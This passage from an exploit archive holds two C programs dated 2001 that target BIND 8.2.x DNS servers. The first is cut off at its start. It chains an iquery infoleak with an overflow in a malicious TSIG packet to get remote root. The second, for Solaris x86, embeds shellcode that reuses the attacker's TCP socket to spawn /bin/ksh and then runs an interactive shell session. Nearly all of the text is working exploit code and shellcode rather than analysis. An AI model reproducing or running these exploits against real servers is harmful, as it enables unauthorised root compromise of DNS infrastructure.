8.2.3-REL) remote root exploit by lucysoft, Ix\n"); printf("[*] fixed by ian@cypherpunks.ca and jwilkins@bitland.net\n\n"); address = 0; if (argc < 2) { printf("[*] usage : %s host\n", argv[0]); return(-1); } if (!(address = resolve_host(argv[1]))) { printf("[x] unable to resolve %s, try using an IP address\n", argv[1]); return(-1); } else { memcpy(foo, &address, 4); printf("[*] attacking %s (%d.%d.%d.%d)\n", argv[1], foo[0], foo[1], foo[2], foo[3]); } sa.sin_family = AF_INET; if (0 > (sock = socket(sa.sin_family, SOCK_DGRAM, 0))) { return(-1); } sa.sin_family = AF_INET; sa.sin_port = htons(53); sa.sin_addr.s_addr= address; len = infoleak_qry(buff); printf("[d] infoleak_qry was %d long\n", len); len = sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa)); if (len < 0) { printf("[*] unable to send iquery\n"); return(-1); } reclen = sizeof(sa); len = recvfrom(sock, buff, BUFFSIZE, 0, (struct sockaddr *)&sa, &reclen); if (len < 0) { printf("[x] unable to receive iquery answer\n"); return(-1); } printf("[*] iquery resp len = %d\n", len); offset = xtract_offset(buff, len); printf("[*] retrieved stack offset = %x\n", offset); len = evil_query(buff, offset); if(len < 0){ printf("[x] error sending tsig packet\n"); return(0); } sendto(sock, buff, len, 0 , (struct sockaddr *)&sa, sizeof(sa)); if (0 > close(sock)) { return(-1); } connection(sa); return(0); } // milw0rm.com [2001-03-02]

/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland *://lsd-pl.net/ #*/ /*## bind 8.2 8.2.1 8.2.2 8.2.2-PX Solaris 2.7 x86 #*/ /* The code establishes a TCP connection with port 53 of a target system. */ /* It makes use of the "infoleek" bug (through UDP) to obtain the base */ /* value of the named process frame stack pointer, which is later used */ /* for constructing proper DNS tsig exploit packet. */ /* */ /* Upon successful exploitation the assembly routine gets executed. It */ /* walks the descriptor table of the exploited named process in a search */ /* for the socket descriptor of the previously established TCP connection. */ /* Found descriptor is duplicated on stdin, stdout and stderr and /bin/sh */ /* is spawned. */ /* */ /* The use of such an assembly routine allows successfull exploitation of */ /* the vulnerability in the case when vulnerable dns servers are protected */ /* by tightly configured firewall systems (with only 53 tcp/udp port open). */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <rpc/rpc.h> #include <netdb.h> #include <stdio.h> #include <errno.h> char msg[]={ 0xab,0xcd,0x09,0x80,0x00,0x00,0x00,0x01, 0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00, 0x01,0x20,0x20,0x20,0x20,0x02,0x61 }; char asmcode[]= "\x1b" /* label len 1+26 */ "\x90" /* padding */ "\x33\xc0" /* xorl %eax,%eax */ "\xeb\x09" /* jmp <syscallcode+13> */ "\x5f" /* popl %edi */ "\x57" /* pushl %edi */ "\x47" /* incl %edi */ "\xab" /* stosl %eax,%es:(%edi) */ "\x47" /* incl %edi */ "\xaa" /* stosb %al,%es:(%edi) */ "\x5e" /* popl %esi */ "\xeb\x0e" /* jmp <syscallcode+26+1> */ "\xe8\xf2\xff\xff\xff" /* call <syscallcode+4> */ "\x9a\xff\xff\xff\xff" "\x07\xff" "\xc3" /* ret */ "\x33" /* label len 51 */ "\x56" /* pushl %esi */ "\x5f" /* popl %edi */ "\x83\xef\x7c" /* subl $0x7c,%edi */ "\x57" /* pushl %edi */ "\x8d\x4f\x10" /* leal 0x10(%edi),%ecx */ "\xb0\x44" /* movb $0x44,%al */ "\xab" /* stosl %eax,%es:(%edi) */ "\xab" /* stosl %eax,%es:(%edi) */ "\x91" /* xchgl %ecx,%eax */ "\xab" /* stosl %eax,%es:(%edi) */ "\x95" /* xchgl %eax,%ebp */ "\x66\xb9\x91\x54" /* movw $0x5491,%cx */ "\x51" /* pushl %ecx */ "\x66\xb9\x01\x01" /* movw $0x0101,%cx */ "\x51" /* pushl %ecx */ "\x33\xc0" /* xorl %eax,%eax */ "\xb0\x36" /* movb $0x36,%al */ "\xff\xd6" /* call *%esi */ "\x59" /* popl %ecx */ "\x33\xdb" /* xorl %ebx,%ebx */ "\x3b\xc3" /* cmpl %ebx,%eax */ "\x75\x0a" /* jne <findsckcode+49> */ "\x66\xbb\x12\x34" /* movw $0x1234,%bx */ "\x66\x39\x5d\x02" /* cmpw %bx,0x2(%ebp) */ "\x74\x03" /* je <findsckcode+51+1> */ "\xe2\xe6" /* loop <findsckcode+25> */ "\x37" /* label len 21+34 */ "\xb0\x09" /* movb $0x09,%al */ "\x50" /* pushl %eax */ "\x51" /* pushl %ecx */ "\x91" /* xchgl %ecx,%eax */ "\xb1\x03" /* movb $0x03,%cl */ "\x49" /* decl %ecx */ "\x89\x4c\x24\x08" /* movl %ecx,0x8(%esp) */ "\x41" /* incl %ecx */ "\x33\xc0" /* xorl %eax,%eax */ "\xb0\x3e" /* movb $0x3e,%al */ "\xff\xd6" /* call *%esi */ "\xe2\xf2" /* loop <findsckcode+58+1> */ "\xeb\x13" /* jmp <shellcode+21> */ "\x33\xd2" /* xorl %edx,%edx */ "\x58" /* popl %eax */ "\x8d\x78\x14" /* leal 0x14(%eax),edi */ "\x52" /* pushl %edx */ "\x57" /* pushl %edi */ "\x50" /* pushl %eax */ "\xab" /* stosl %eax,%es:(%edi) */ "\x92" /* xchgl %eax,%edx */ "\xab" /* stosl %eax,%es:(%edi) */ "\x88\x42\x08" /* movb %al,0x8(%edx) */ "\xb0\x3b" /* movb $0x3b,%al */ "\xff\xd6" /* call *%esi */ "\xe8\xe8\xff\xff\xff" /* call <shellcode+2> */ "/bin/ksh" ; int rev(int a){ int i=1; if((*(char*)&i)) return(a); return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24); } int main(int argc,char **argv){ char buffer[1024],*b; int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1; struct hostent *hp; struct sockaddr_in adr; printf("copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/\n"); printf("bind 8.2 8.2.1 8.2.2 8.2.2PX for solaris 2.7 x86\n\n"); if(argc<2){ printf("usage: %s address [-s][-e]\n",argv[0]); printf(" -s send infoleek packet\n"); printf(" -e send exploit packet\n"); exit(-1); } while((c=getopt(argc-1,&argv[1],"se"))!=-1){ switch(c){ case 's': flag=1;break; case 'e': flag=2; } } if(flag==-1) exit(-1); adr.sin_family=AF_INET; adr.sin_port=htons(53); if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1) { if((hp=gethostbyname(argv[1]))==NULL) { errno=EADDRNOTAVAIL;goto err; } memcpy(&adr.sin_addr.s_addr,hp->h_addr,4); } sck[0]=socket(AF_INET,SOCK_DGRAM,0); sck[1]=socket(AF_INET,SOCK_STREAM,0); if(connect(sck[0],(struct sockaddr*)&adr,sizeof(adr))<0) goto err; if(connect(sck[1],(struct sockaddr*)&adr,sizeof(adr))<0) goto err; i=sizeof(struct sockaddr_in); if(getsockname(sck[1],(struct sockaddr*)&adr,&i)==-1){ struct netbuf {unsigned int maxlen;unsigned int len;char *buf;}; struct netbuf nb; ioctl(sck[1],(('S'<<8)|2),"sockmod"); nb.maxlen=0xffff; nb.len=sizeof(struct sockaddr_in);; nb.buf=(char*)&adr; ioctl(sck[1],(('T'<<8)|144),&nb); } n=ntohs(adr.sin_port); asmcode[1+1+26+1+39+2]=(unsigned char)((n>>8)&0xff); asmcode[1+1+26+1+39+3]=(unsigned char)(n&0xff); if(write(sck[0],msg,sizeof(msg))==-1) goto err; if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1) goto err; printf("stack dump:\n"); for(i=0;i<(cnt-512);i++){ printf("%s%02x ",(i&&(!(i%16)))?"\n":"",(unsigned char)buffer[512+i]); } printf("\n\n"); fp=rev(*(unsigned int*)&buffer[532]); ofs=0x0106-((fp-(fp&0xffffff00))&0xff); cnt=163; if((buffer[512+20+2]!=(char)0x04)&&(buffer[512+20+3]!=(char)0x08)){ printf("system does not seem to be a vulnerable solaris\n");exit(1); } if(flag==1){ printf("system seems to be running bind 8.2.x on a solaris\n");exit(-1); } if(cnt<(ofs+12)){ printf("frame ptr is too low to be successfully exploited\n");exit(-1); } jmp=rev(fp-583); ptr6=rev((fp&0xffffff00)+8); fp=rev(fp&0xffffff00); printf("frame ptr=0x%08x adr=%08x ofs=%d ",rev(fp),rev(jmp),ofs); printf("port=%04x connected! ",(unsigned short)n);fflush(stdout); b=buffer; memcpy(b,"\xab\xcd\x01\x00\x00\x02\x00\x00\x00\x00\x00\x01",12);b+=12; for(i=0;i<strlen(asmcode);i++) *b++=asmcode[i]; for(i=0;i<(120>>1);i++,b++) *b++=0x01; memcpy(b,"\x00\x00\x01\x00\x01",5);b+=5; for(i=0;i<((ofs+64)>>1);i++,b++) *b++=0x01; *b++=12; memcpy(b,&jmp,4);b+=4; memcpy(b,"\x06\x00\x00\x00",4);b+=4; memcpy(b,&ptr6,4);b+=4; cnt-=ofs+12; for(i=0;i<(cnt>>1);i++,b++) *b++=0x01; memcpy(b,"\x00\x00\x01\x00\x01\x00\x00\xfa\xff",9);b+=9; if(write(sck[0],buffer,b-buffer)==-1) goto err; sleep(1);printf("sent!\n"); write(sck[1],"/bin/uname -a\n",14); while(1){ fd_set fds; FD_ZERO(&fds); FD_SET(0,&fds); FD_SET(sck[1],&fds); if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){ int cnt; char buf[1024]; if(FD_ISSET(0,&fds)){ if((cnt=read(0,buf,1024))<1){ if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else break; } write(sck[1],buf,cnt); } if(FD_ISSET(sck[1],&fds)){ if((cnt=read(sck[1],buf,1024))<1){ if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else break; } write(1,buf,cnt); } } } exit(0); err: perror("error");exit(-1); } // milw0rm.com [2001-03-01]